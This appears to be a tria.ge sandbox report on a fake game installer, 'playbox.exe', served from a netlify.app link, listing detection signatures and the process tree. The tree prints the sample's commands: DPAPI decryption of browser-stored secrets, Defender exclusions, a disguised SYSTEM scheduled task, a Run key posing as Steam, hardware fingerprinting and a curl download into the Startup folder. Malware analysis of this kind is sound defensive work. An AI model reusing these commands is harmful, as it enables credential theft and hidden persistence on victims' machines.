Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

01/07/2024, 15:02

240701-sev2na1fnq 8

01/07/2024, 14:43

240701-r3zjbaxbld 1

01/07/2024, 07:26

240701-h91khsyhlc 1

Analysis

  • max time kernel
    112s
  • max time network
    111s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/07/2024, 15:02

General

  • Target

    http://playboxgamemix.netlify.app

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 11 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://playboxgamemix.netlify.app
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4988
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9747eab58,0x7ff9747eab68,0x7ff9747eab78
      2⤵
        PID:2264
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=280 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:2
        2⤵
          PID:3064
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:8
          2⤵
            PID:4448
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2212 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:8
            2⤵
              PID:2840
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2776 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:1
              2⤵
                PID:1864
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2800 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:1
                2⤵
                  PID:3432
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3900 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:1
                  2⤵
                    PID:2436
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4944 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:8
                    2⤵
                      PID:1792
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4440 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:8
                      2⤵
                        PID:432
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4972 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:8
                        2⤵
                          PID:3492
                      • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                        "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                        1⤵
                          PID:904
                        • C:\Windows\System32\rundll32.exe
                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                          1⤵
                            PID:3388
                          • C:\Program Files\7-Zip\7zG.exe
                            "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\PlayboxSetup\" -spe -an -ai#7zMap31564:86:7zEvent17851
                            1⤵
                            • Suspicious use of FindShellTrayWindow
                            PID:5040
                          • C:\Users\Admin\Downloads\PlayboxSetup\playbox.exe
                            "C:\Users\Admin\Downloads\PlayboxSetup\playbox.exe"
                            1⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2716
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
                              2⤵
                                PID:2988
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
                                  3⤵
                                    PID:4428
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell.exe -noprofile -
                                    3⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4268
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oulxpk2c\oulxpk2c.cmdline"
                                      4⤵
                                        PID:668
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE937.tmp" "c:\Users\Admin\AppData\Local\Temp\oulxpk2c\CSC6CF1C74C3D3C4D7BB74171C975C58C6D.TMP"
                                          5⤵
                                            PID:4592
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                      2⤵
                                        PID:2368
                                        • C:\Windows\system32\curl.exe
                                          curl http://api.ipify.org/ --ssl-no-revoke
                                          3⤵
                                            PID:3908
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                          2⤵
                                            PID:4344
                                            • C:\Windows\system32\tasklist.exe
                                              tasklist
                                              3⤵
                                              • Enumerates processes with tasklist
                                              PID:3492
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
                                            2⤵
                                              PID:1068
                                              • C:\Windows\system32\taskkill.exe
                                                taskkill /IM chrome.exe /F
                                                3⤵
                                                • Kills process with taskkill
                                                PID:3136
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                              2⤵
                                                PID:4528
                                                • C:\Windows\system32\tasklist.exe
                                                  tasklist
                                                  3⤵
                                                  • Enumerates processes with tasklist
                                                  PID:3996
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,6,99,59,19,92,149,197,65,145,228,210,141,215,140,131,116,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,155,35,83,190,139,240,78,64,183,181,176,71,154,136,46,8,154,175,198,238,66,163,199,19,96,154,189,19,157,7,98,100,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,121,32,168,152,124,29,126,161,46,102,36,210,172,232,79,133,7,149,72,161,111,219,248,207,78,78,45,212,7,0,196,95,48,0,0,0,254,221,17,226,162,246,210,144,181,174,8,17,112,91,2,188,27,116,7,240,53,165,197,248,206,109,93,19,115,128,29,174,255,134,212,76,70,27,93,216,139,50,1,209,204,193,59,55,64,0,0,0,207,184,225,20,186,104,44,46,202,44,51,151,158,1,215,252,254,82,197,210,118,130,96,79,86,107,109,226,74,57,130,147,113,159,137,248,111,189,48,247,47,64,190,226,117,187,13,62,42,36,201,25,51,96,88,26,62,114,5,242,86,224,211,96), $null, 'CurrentUser')"
                                                2⤵
                                                • An obfuscated cmd.exe command-line is typically used to evade detection.
                                                PID:3896
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,6,99,59,19,92,149,197,65,145,228,210,141,215,140,131,116,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,155,35,83,190,139,240,78,64,183,181,176,71,154,136,46,8,154,175,198,238,66,163,199,19,96,154,189,19,157,7,98,100,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,121,32,168,152,124,29,126,161,46,102,36,210,172,232,79,133,7,149,72,161,111,219,248,207,78,78,45,212,7,0,196,95,48,0,0,0,254,221,17,226,162,246,210,144,181,174,8,17,112,91,2,188,27,116,7,240,53,165,197,248,206,109,93,19,115,128,29,174,255,134,212,76,70,27,93,216,139,50,1,209,204,193,59,55,64,0,0,0,207,184,225,20,186,104,44,46,202,44,51,151,158,1,215,252,254,82,197,210,118,130,96,79,86,107,109,226,74,57,130,147,113,159,137,248,111,189,48,247,47,64,190,226,117,187,13,62,42,36,201,25,51,96,88,26,62,114,5,242,86,224,211,96), $null, 'CurrentUser')
                                                  3⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:5012
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,6,99,59,19,92,149,197,65,145,228,210,141,215,140,131,116,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,165,162,117,116,222,101,115,200,198,214,189,245,245,145,112,137,100,37,252,99,133,68,167,154,134,73,170,205,22,190,20,2,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,234,179,229,152,186,119,58,6,125,108,83,47,218,192,240,123,221,34,151,0,206,114,233,204,166,38,170,69,208,29,245,222,48,0,0,0,65,234,21,156,203,156,10,193,40,122,154,0,187,175,47,36,219,240,254,153,152,79,157,119,242,202,73,181,189,206,175,113,209,54,169,250,74,132,71,138,234,154,73,207,130,9,239,28,64,0,0,0,184,172,213,9,161,199,246,52,21,22,63,113,174,73,169,114,80,71,218,105,64,88,130,68,70,73,183,78,202,229,196,7,113,251,79,57,191,121,31,85,229,109,39,22,249,15,16,107,166,186,144,81,225,232,117,12,181,132,89,212,154,104,235,116), $null, 'CurrentUser')"
                                                2⤵
                                                • An obfuscated cmd.exe command-line is typically used to evade detection.
                                                PID:5060
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,6,99,59,19,92,149,197,65,145,228,210,141,215,140,131,116,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,165,162,117,116,222,101,115,200,198,214,189,245,245,145,112,137,100,37,252,99,133,68,167,154,134,73,170,205,22,190,20,2,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,234,179,229,152,186,119,58,6,125,108,83,47,218,192,240,123,221,34,151,0,206,114,233,204,166,38,170,69,208,29,245,222,48,0,0,0,65,234,21,156,203,156,10,193,40,122,154,0,187,175,47,36,219,240,254,153,152,79,157,119,242,202,73,181,189,206,175,113,209,54,169,250,74,132,71,138,234,154,73,207,130,9,239,28,64,0,0,0,184,172,213,9,161,199,246,52,21,22,63,113,174,73,169,114,80,71,218,105,64,88,130,68,70,73,183,78,202,229,196,7,113,251,79,57,191,121,31,85,229,109,39,22,249,15,16,107,166,186,144,81,225,232,117,12,181,132,89,212,154,104,235,116), $null, 'CurrentUser')
                                                  3⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4732
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
                                                2⤵
                                                  PID:1856
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic diskdrive get serialnumber
                                                    3⤵
                                                      PID:988
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
                                                    2⤵
                                                      PID:4428
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
                                                        3⤵
                                                          PID:4272
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
                                                        2⤵
                                                          PID:1164
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
                                                            3⤵
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:1800
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
                                                          2⤵
                                                          • Hide Artifacts: Hidden Window
                                                          PID:2796
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
                                                            3⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Adds Run key to start application
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:4236
                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y35tc3vz\y35tc3vz.cmdline"
                                                              4⤵
                                                                PID:1912
                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF201.tmp" "c:\Users\Admin\AppData\Local\Temp\y35tc3vz\CSCECD6AEB0B7B48AC8F99B996E6A061CB.TMP"
                                                                  5⤵
                                                                    PID:4456
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                              2⤵
                                                                PID:4684
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic bios get smbiosbiosversion
                                                                  3⤵
                                                                    PID:4904
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
                                                                  2⤵
                                                                    PID:4152
                                                                    • C:\Windows\system32\cscript.exe
                                                                      cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
                                                                      3⤵
                                                                      • Checks computer location settings
                                                                      PID:1388
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
                                                                        4⤵
                                                                          PID:2924
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
                                                                            5⤵
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:4072
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
                                                                            5⤵
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:2604
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\Downloads\PlayboxSetup\playbox.exe" /f
                                                                            5⤵
                                                                            • Adds Run key to start application
                                                                            • Modifies registry key
                                                                            PID:4208
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
                                                                            5⤵
                                                                            • Modifies registry key
                                                                            PID:1332
                                                                          • C:\Windows\system32\curl.exe
                                                                            curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
                                                                            5⤵
                                                                              PID:4944
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
                                                                        2⤵
                                                                          PID:2908
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic baseboard get serialnumber
                                                                            3⤵
                                                                              PID:3040
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                            2⤵
                                                                              PID:2984
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic MemoryChip get /format:list
                                                                                3⤵
                                                                                  PID:3652
                                                                                • C:\Windows\system32\find.exe
                                                                                  find /i "Speed"
                                                                                  3⤵
                                                                                    PID:1568
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
                                                                                  2⤵
                                                                                    PID:1832
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic path win32_computersystemproduct get uuid
                                                                                      3⤵
                                                                                        PID:4004
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                      2⤵
                                                                                        PID:5040
                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                          wmic path win32_VideoController get name
                                                                                          3⤵
                                                                                          • Detects videocard installed
                                                                                          PID:4764
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
                                                                                        2⤵
                                                                                          PID:1140
                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                            wmic PATH Win32_VideoController GET Description,PNPDeviceID
                                                                                            3⤵
                                                                                              PID:1084
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                                            2⤵
                                                                                              PID:2080
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                                                3⤵
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:3876
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
                                                                                              2⤵
                                                                                                PID:4344
                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                  wmic memorychip get serialnumber
                                                                                                  3⤵
                                                                                                    PID:1656
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
                                                                                                  2⤵
                                                                                                    PID:4904
                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                      wmic csproduct get uuid
                                                                                                      3⤵
                                                                                                        PID:1464
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                                                      2⤵
                                                                                                        PID:5012
                                                                                                        • C:\Windows\system32\curl.exe
                                                                                                          curl http://api.ipify.org/ --ssl-no-revoke
                                                                                                          3⤵
                                                                                                          • Blocklisted process makes network request
                                                                                                          PID:3764
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
                                                                                                        2⤵
                                                                                                          PID:1012
                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                            wmic cpu get processorid
                                                                                                            3⤵
                                                                                                              PID:3292
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                                                            2⤵
                                                                                                              PID:2728
                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                wmic bios get smbiosbiosversion
                                                                                                                3⤵
                                                                                                                  PID:4920
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
                                                                                                                2⤵
                                                                                                                  PID:4160
                                                                                                                  • C:\Windows\system32\getmac.exe
                                                                                                                    getmac /NH
                                                                                                                    3⤵
                                                                                                                      PID:3908
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                                                    2⤵
                                                                                                                      PID:3684
                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                        wmic MemoryChip get /format:list
                                                                                                                        3⤵
                                                                                                                          PID:5044
                                                                                                                        • C:\Windows\system32\find.exe
                                                                                                                          find /i "Speed"
                                                                                                                          3⤵
                                                                                                                            PID:4360
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                                                          2⤵
                                                                                                                            PID:3388
                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                              wmic path win32_VideoController get name
                                                                                                                              3⤵
                                                                                                                              • Detects videocard installed
                                                                                                                              PID:4608
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                                                                            2⤵
                                                                                                                              PID:1156
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                                                                                3⤵
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:2292
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                                                                              2⤵
                                                                                                                                PID:2136
                                                                                                                                • C:\Windows\system32\curl.exe
                                                                                                                                  curl http://api.ipify.org/ --ssl-no-revoke
                                                                                                                                  3⤵
                                                                                                                                    PID:2220
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                                                                                  2⤵
                                                                                                                                    PID:4060
                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                      wmic bios get smbiosbiosversion
                                                                                                                                      3⤵
                                                                                                                                        PID:1072
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                                                                      2⤵
                                                                                                                                        PID:3764
                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                          wmic MemoryChip get /format:list
                                                                                                                                          3⤵
                                                                                                                                            PID:1884
                                                                                                                                          • C:\Windows\system32\find.exe
                                                                                                                                            find /i "Speed"
                                                                                                                                            3⤵
                                                                                                                                              PID:892
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                                                                            2⤵
                                                                                                                                              PID:736
                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                wmic path win32_VideoController get name
                                                                                                                                                3⤵
                                                                                                                                                • Detects videocard installed
                                                                                                                                                PID:3292
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                                                                                              2⤵
                                                                                                                                                PID:2172
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
